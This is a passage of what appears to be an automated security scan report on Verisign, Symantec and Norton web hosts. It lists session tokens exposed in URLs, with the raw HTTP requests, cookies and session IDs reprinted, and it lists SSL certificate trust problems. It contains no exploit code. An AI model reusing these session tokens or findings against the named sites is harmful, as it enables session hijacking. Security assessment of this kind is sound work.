GET /home.v;jsessionid=1695809E810A8CD4C2D73D9071CB7888.tomcat2 HTTP/1.1 Host: m.verisign.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_; JSESSIONID=1695809E810A8CD4C2D73D9071CB7888.tomcat2
Response
HTTP/1.1 301 Moved Permanently Date: Fri, 09 Sep 2011 22:03:49 GMT Server: Apache Location: http://vipmobile.verisign.com/home.v Content-Length: 316 Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://vipmobile.verisi...[SNIP]...
7.6. http://mbox3.offermatica.com/m2/verisign/mbox/standard
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
http://mbox3.offermatica.com
Path:
/m2/verisign/mbox/standard
Issue detail
The URL in the request appears to contain a session token within the query string:http://mbox3.offermatica.com/m2/verisign/mbox/standard?mboxHost=www.verisign.com&mboxSession=1315621455064-973488&mboxPC=1315621455064-973488.19&mboxPage=1315621506825-922680&mboxXDomain=enabled&mboxCount=1&protocol=http%3A&serverDomain=www.verisign.com&referrer=none&mbox=VRSN_HP_AccBox_2011&mboxId=0&mboxURL=http%3A//www.verisign.com/&mboxReferrer=&mboxVersion=31
Request
GET /m2/verisign/mbox/standard?mboxHost=www.verisign.com&mboxSession=1315621455064-973488 &mboxPC=1315621455064-973488.19&mboxPage=1315621506825-922680&mboxXDomain=enabled&mboxCount=1&protocol=http%3A&serverDomain=www.verisign.com&referrer=none&mbox=VRSN_HP_AccBox_2011&mboxId=0&mboxURL=http%3A//www.verisign.com/&mboxReferrer=&mboxVersion=31 HTTP/1.1 Host: mbox3.offermatica.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mboxPC=1315621455064-973488.19
Response
HTTP/1.1 200 OK P3P: CP="NOI DSP CURa OUR STP COM" Set-Cookie: mboxPC=1315621455064-973488.19; Domain=offermatica.com; Expires=Sun, 09-Oct-2011 21:24:38 GMT; Path=/m2/verisign Content-Type: text/javascript Content-Length: 154 Date: Fri, 09 Sep 2011 21:24:37 GMT Server: Test & Target mboxFactoryDefault.get('VRSN_HP_AccBox_2011',0).setOffer(new mboxOfferDefault()).loaded();mboxFactoryDefault.getPCId().forceId("1315621455064-973488.19");
7.7. http://mbox3.offermatica.com/m2/verisign/ubox/image
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
http://mbox3.offermatica.com
Path:
/m2/verisign/ubox/image
Issue detail
The URL in the request appears to contain a session token within the query string:http://mbox3.offermatica.com/m2/verisign/ubox/image?mbox=time_spent&mboxSession=1315621455064-973488&mboxPC=1315621455064-973488.19&mboxXDomain=disabled&mboxDefault=http%3A//www.verisign.com/stellent/groups/public/documents/image/spacer.gif&t=1315621500070&mboxPageValue=0.25
Request
GET /m2/verisign/ubox/image?mbox=time_spent&mboxSession=1315621455064-973488 &mboxPC=1315621455064-973488.19&mboxXDomain=disabled&mboxDefault=http%3A//www.verisign.com/stellent/groups/public/documents/image/spacer.gif&t=1315621500070&mboxPageValue=0.25 HTTP/1.1 Host: mbox3.offermatica.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mboxPC=1315621455064-973488.19
Response
HTTP/1.1 302 Moved Temporarily Location: http://www.verisign.com/stellent/groups/public/documents/image/spacer.gif Content-Length: 0 Date: Fri, 09 Sep 2011 21:24:33 GMT Server: Test & Target
7.8. http://player.ooyala.com/sas/authorized
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
http://player.ooyala.com
Path:
/sas/authorized
Issue detail
The URL in the request appears to contain a session token within the query string:http://player.ooyala.com/sas/authorized?analytics%5Fparams=%7B%22pcode%22%3A%22w1c2U6fqVnqafrMhiALawYi9UUck%22%7D&token=AA%2DqZeKXlu6K%2D004e6a82e2%2DpV6aaVTozOYv5jDhwDiyHvickxVNrKeSqY%2E6lHZYpEk&domain=www%2Everisign%2Ecom&embed%5Fcode%5Flist=w0NmJhMTqAVBik2%2DmvMAlw7lBOLLrNpG×tamp=1315621597961&parent%5Fauthorized=true&signature=gKOWJocIDV592zgrbyHmOsSN4fTOnBy1%2FCAEHtU5LWI&device=WIN%2010%2C3%2C183%2C7
Request
GET /sas/authorized?analytics%5Fparams=%7B%22pcode%22%3A%22w1c2U6fqVnqafrMhiALawYi9UUck%22%7D&token=AA%2DqZeKXlu6K%2D004e6a82e2%2DpV6aaVTozOYv5jDhwDiyHvickxVNrKeSqY%2E6lHZYpEk &domain=www%2Everisign%2Ecom&embed%5Fcode%5Flist=w0NmJhMTqAVBik2%2DmvMAlw7lBOLLrNpG×tamp=1315621597961&parent%5Fauthorized=true&signature=gKOWJocIDV592zgrbyHmOsSN4fTOnBy1%2FCAEHtU5LWI&device=WIN%2010%2C3%2C183%2C7 HTTP/1.1 Host: player.ooyala.com Proxy-Connection: keep-alive Referer: http://player.ooyala.com/static/cacheable/d2ac0151cf5faecb401182d187b5c9e8/player_v2.swf User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=131238736.759487282.1315547307.1315547307.1315547307.1; __utmz=131238736.1315547307.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:447-EQK-225&token:_mch-ooyala.com-1315547307468-28819
Response
HTTP/1.1 200 OK Status: 200 OK Content-Type: text/xml Content-Length: 716 Cache-Control: public, no-cache Date: Fri, 09 Sep 2011 21:26:08 GMT Connection: close iIDd0cueavrMh4p7kKVwfDcKB+ydo50WBbUtMLcgvZOMV/yRRHo/BjHe7Ytn h3ltGU20Y0cCg8XVm0HlhUPMdTKA+JkrJ5pAHN/j9mrAIR/Jw56Ch+2AScL9 kbgM6ukGT0KwlzosaQtFwR5wEFC0kFnQVUo+wQnxNvAdBozZlJHBiYVlg2SO JotiY/UdyOFK+TiH1...[SNIP]...
7.9. https://renewals.symantec.com/renewals/images/icon-pop-up.gif
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://renewals.symantec.com
Path:
/renewals/images/icon-pop-up.gif
Issue detail
The URL in the request appears to contain a session token within the query string:https://renewals.symantec.com/renewals/images/icon-pop-up.gif;jsessionid=L9pmTqFWjzHv2V21JQT7v8CfZlMK3Ry0HG4TNv2SJXLVJpDMpWc1!210426435
Request
GET /renewals/images/icon-pop-up.gif;jsessionid=L9pmTqFWjzHv2V21JQT7v8CfZlMK3Ry0HG4TNv2SJXLVJpDMpWc1!210426435 HTTP/1.1 Host: renewals.symantec.com Connection: keep-alive Referer: https://renewals.symantec.com/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621903651-New%7C1336357903651%3B%20event69%3Devent69%7C1336357903652%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/8; JSESSIONID=L9pmTqFWjzHv2V21JQT7v8CfZlMK3Ry0HG4TNv2SJXLVJpDMpWc1!210426435
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:31:50 GMT Content-Length: 60 Content-Type: image/gif Last-Modified: Thu, 18 Mar 2010 01:42:30 GMT Accept-Ranges: bytes GIF89a . .....G....!.......,.... . ......g.....O...U...-G..;
7.10. http://sales.liveperson.net/hc/2735064/
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
http://sales.liveperson.net
Path:
/hc/2735064/
Issue detail
The URL in the request appears to contain a session token within the query string:http://sales.liveperson.net/hc/2735064/?&site=2735064&cmd=mTagStartPage&lpCallId=480831184191-637837637215&protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/landingProductFeatures%3Frdid%3D8504bbeb-1b35-477e-abfe-b3f645ab12841315603878013&id=3141287025&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-norton-estore-us-english&activePlugin=none&cobrowse=true&PV%21unit=norton-estore-us&PV%21iproducts=na&PV%21offered_sku_desc_int=na&PV%21pagename=store%3Aus%3Ahho%20mf%3Ahomepage%3Ahomepage&PV%21ucproduct=na&PV%21offered_sku_desc=na&PV%21billingerror=false&PV%21pageLoadTime=1%20sec&PV%21visitorActive=1&SV%21language=english&SV%21traffic_source=store%3Atrf_id%3Asymcom&SV%21current_subchannel=store%3Aonline%20%281st%29&SV%21language=en&SV%21site_id=store%3Aus&SV%21country=us&SV%21incoming_productSKU=&SV%21session_guid=359A5BC1-187B-E37B-9025-A486DEF7EF50&SV%21partner=store%3Asymantec&title=Norton%20Security%20-%20Antivirus%20Software%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true
Request
GET /hc/2735064/?&site=2735064&cmd=mTagStartPage&lpCallId=480831184191-637837637215&protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/landingProductFeatures%3Frdid%3D8504bbeb-1b35-477e-abfe-b3f645ab12841315603878013&id=3141287025&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-norton-estore-us-english&activePlugin=none&cobrowse=true&PV%21unit=norton-estore-us&PV%21iproducts=na&PV%21offered_sku_desc_int=na&PV%21pagename=store%3Aus%3Ahho%20mf%3Ahomepage%3Ahomepage&PV%21ucproduct=na&PV%21offered_sku_desc=na&PV%21billingerror=false&PV%21pageLoadTime=1%20sec&PV%21visitorActive=1&SV%21language=english&SV%21traffic_source=store%3Atrf_id%3Asymcom&SV%21current_subchannel=store%3Aonline%20%281st%29&SV%21language=en&SV%21site_id=store%3Aus&SV%21country=us&SV%21incoming_productSKU=&SV%21session_guid=359A5BC1-187B-E37B-9025-A486DEF7EF50 &SV%21partner=store%3Asymantec&title=Norton%20Security%20-%20Antivirus%20Software%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=8504bbeb-1b35-477e-abfe-b3f645ab12841315603878013 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=3716944001314187740; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603882871
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:31:25 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Set-Cookie: LivePersonID=-5110247826455-1315603885:0; expires=Sat, 08-Sep-2012 21:31:25 GMT; path=/hc/2735064; domain=.liveperson.net Set-Cookie: HumanClickKEY=3716944001314187740; path=/hc/2735064 Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064 Set-Cookie: LivePersonID=-5110247826455-1315603885:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:31:25 GMT; path=/hc/2735064; domain=.liveperson.net Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 09 Sep 2011 21:31:25 GMT Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 1998 lpConnLib.Process({"ResultSet": {"lpCallId":"480831184191-637837637215","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SYSTEM!updateButtonStatic_compact.js", "js_code": "function lpUpdateStaticButton...[SNIP]...
7.11. https://securitycenter.verisign.com/celp/enroll/retail
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://securitycenter.verisign.com
Path:
/celp/enroll/retail
Issue detail
The URL in the request appears to contain a session token within the query string:https://securitycenter.verisign.com/celp/enroll/retail;jsessionid=OqE0Tm00XOqZIfwiE7FczMWMMOkVjg1izXQLLDKjlcyrNzI8OY4a!-1800460983
Request
GET /celp/enroll/retail;jsessionid=OqE0Tm00XOqZIfwiE7FczMWMMOkVjg1izXQLLDKjlcyrNzI8OY4a!-1800460983 HTTP/1.1 Host: securitycenter.verisign.com Connection: keep-alive Referer: http://www.verisign.com/code-signing/index.html?tid=a_box User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=OqE0Tm00XOqZIfwiE7FczMWMMOkVjg1izXQLLDKjlcyrNzI8OY4a!-1800460983
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Fri, 09 Sep 2011 21:27:17 GMT Content-length: 408 Content-type: text/html Last-Modified: Mon, 12 Jan 2004 23:04:38 GMT Accept-Ranges: bytes <html> <head> <title>VeriSign Retail</title> <META HTTP-EQUIV="Pragma" CONTENT="no-cache"> <META HTTP-EQUIV="Expires" CONTENT="-1"> </head> <body bgcolor="#ffffff"> <h1>System Unavailable</h1>...[SNIP]...
7.12. http://symantec.tt.omtrdc.net/m2/symantec/mbox/standard
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
http://symantec.tt.omtrdc.net
Path:
/m2/symantec/mbox/standard
Issue detail
The URL in the request appears to contain a session token within the query string:http://symantec.tt.omtrdc.net/m2/symantec/mbox/standard?mboxHost=us.norton.com&mboxSession=1315621887128-280442&mboxPage=1315621887128-280442&screenHeight=1200&screenWidth=1920&browserWidth=1147&browserHeight=957&browserTimeOffset=-300&colorDepth=16&mboxCount=1&mbox=norton_lp_redirect&mboxId=0&mboxTime=1315603887688&mboxURL=http%3A%2F%2Fus.norton.com%2Findex.jsp&mboxReferrer=http%3A%2F%2Fwww.symantec.com%2Fbusiness%2Fverisign%2Ffraud-detection-service%3Ftid%3Dgnps&mboxVersion=39
Request
GET /m2/symantec/mbox/standard?mboxHost=us.norton.com&mboxSession=1315621887128-280442 &mboxPage=1315621887128-280442&screenHeight=1200&screenWidth=1920&browserWidth=1147&browserHeight=957&browserTimeOffset=-300&colorDepth=16&mboxCount=1&mbox=norton_lp_redirect&mboxId=0&mboxTime=1315603887688&mboxURL=http%3A%2F%2Fus.norton.com%2Findex.jsp&mboxReferrer=http%3A%2F%2Fwww.symantec.com%2Fbusiness%2Fverisign%2Ffraud-detection-service%3Ftid%3Dgnps&mboxVersion=39 HTTP/1.1 Host: symantec.tt.omtrdc.net Proxy-Connection: keep-alive Referer: http://us.norton.com/index.jsp User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]
Response
HTTP/1.1 200 OK pragma: no-cache Content-Type: text/javascript Content-Length: 1591 Date: Fri, 09 Sep 2011 21:30:58 GMT Server: Test & Target var mboxCurrent=mboxFactories.get('default').get('norton_lp_redirect',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mboxImported-defau...[SNIP]...
7.13. https://trust-center.verisign.com/process/retail/trust_product_selector
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://trust-center.verisign.com
Path:
/process/retail/trust_product_selector
Issue detail
The URL in the request appears to contain a session token within the query string:https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
Request
GET /process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c &product=TRUSTSEAL001 HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: http://www.verisign.com/trust-seal/index.html?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTHID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:32 GMT Server: Apache Set-Cookie: TLTHID=6380DBE4DB2A10DB44A4B1847A7DDBAF; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html;charset=utf-8 Content-Length: 41019 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> ...[SNIP]...
7.14. http://vipmobile.verisign.com/images/favicon.ico
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
http://vipmobile.verisign.com
Path:
/images/favicon.ico
Issue detail
The URL in the request appears to contain a session token within the query string:http://vipmobile.verisign.com/images/favicon.ico;jsessionid=2D09D7FD63CC5CC2C8FC4F5A841ADA15.tomcat2
Request
GET /images/favicon.ico;jsessionid=2D09D7FD63CC5CC2C8FC4F5A841ADA15.tomcat2 HTTP/1.1 Host: vipmobile.verisign.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_; __fds_fp_id__=44590564957.2; JSESSIONID=39BCE0979E896FBFC247F406B455ECFD.tomcat2
Response
HTTP/1.1 301 Moved Permanently Date: Fri, 09 Sep 2011 22:04:01 GMT Server: Apache Location: http://vipmobile.verisign.com/images/favicon.ico Content-Length: 328 Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://vipmobile.verisi...[SNIP]...
7.15. https://vipmobile.verisign.com/home.v
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://vipmobile.verisign.com
Path:
/home.v
Issue detail
The URL in the request appears to contain a session token within the query string:https://vipmobile.verisign.com/home.v;jsessionid=5B879E00A090344FCA461344644F595F.tomcat1
Request
GET /home.v;jsessionid=5B879E00A090344FCA461344644F595F.tomcat1 HTTP/1.1 Host: vipmobile.verisign.com Connection: keep-alive Referer: https://idprotect.verisign.com/orderstart.v Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.11.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____; JSESSIONID=5B879E00A090344FCA461344644F595F.tomcat1
Response
HTTP/1.1 301 Moved Permanently Date: Fri, 09 Sep 2011 21:52:05 GMT Server: Apache Location: https://vipmobile.verisign.com/home.v Content-Length: 318 Keep-Alive: timeout=15 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="https://vipmobile.veris...[SNIP]...
8. SSL certificate
previous
next
There are 37 instances of this issue:
Issue background
SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed. It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.
8.1. https://fileconnect.symantec.com/
previous
next
Summary
Severity:
Medium
Confidence:
Certain
Host:
https://fileconnect.symantec.com
Path:
/
Issue detail
The following problem was identified with the server's SSL certificate:The server's certificate is not trusted. The server presented the following certificate:Issued to: FILECONNECT.SYMANTEC.COM Issued by: VeriSign Class 3 International Server CA - G3 Valid from: Thu Jul 07 18:00:00 GMT-06:00 2011 Valid to: Sat Jul 07 17:59:59 GMT-06:00 2012
8.2. https://forms.verisign.com/
previous
next
Summary
Severity:
Medium
Confidence:
Certain
Host:
https://forms.verisign.com
Path:
/
Issue detail
The following problem was identified with the server's SSL certificate:The server's certificate is not trusted. The server presented the following certificate:Issued to: forms.verisign.com Issued by: VeriSign Class 3 Extended Validation SSL SGC CA Valid from: Sun May 29 18:00:00 GMT-06:00 2011 Valid to: Wed May 29 17:59:59 GMT-06:00 2013
8.3. https://knowledge.verisign.ch/
previous
next
Summary
Severity:
Medium
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/
Issue detail
The following problems were identified with the server's SSL certificate:The server's certificate is not valid for the server's hostname. The server's certificate is not trusted. The server presented the following certificates:Server certificate Issued to: vrsn-intl.verisign.com Issued by: VeriSign Class 3 Extended Validation SSL SGC CA Valid from: Tue Jun 08 18:00:00 GMT-06:00 2010 Valid to: Fri Jun 08 17:59:59 GMT-06:00 2012
Certificate chain #1 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: Class 3 Public Primary Certification Authority Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Sun Nov 07 17:59:59 GMT-06:00 2021
Certificate chain #2 Issued to: VeriSign Class 3 Extended Validation SSL SGC CA Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Mon Nov 07 17:59:59 GMT-06:00 2016
Certificate chain #3 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Wed Jul 16 17:59:59 GMT-06:00 2036
8.4. https://knowledge.verisign.com/
previous
next
Summary
Severity:
Medium
Confidence:
Certain
Host:
https://knowledge.verisign.com
Path:
/
Issue detail
The following problem was identified with the server's SSL certificate:The server's certificate is not trusted. The server presented the following certificates:Server certificate Issued to: knowledge.verisign.com Issued by: VeriSign Class 3 Extended Validation SSL SGC CA Valid from: Tue Feb 02 18:00:00 GMT-06:00 2010 Valid to: Mon Feb 20 17:59:59 GMT-06:00 2012
Certificate chain #1 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: Class 3 Public Primary Certification Authority Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Sun Nov 07 17:59:59 GMT-06:00 2021
Certificate chain #2 Issued to: VeriSign Class 3 Extended Validation SSL SGC CA Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Mon Nov 07 17:59:59 GMT-06:00 2016
Certificate chain #3 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Wed Jul 16 17:59:59 GMT-06:00 2036
8.5. https://onlinefamily.norton.com/
previous
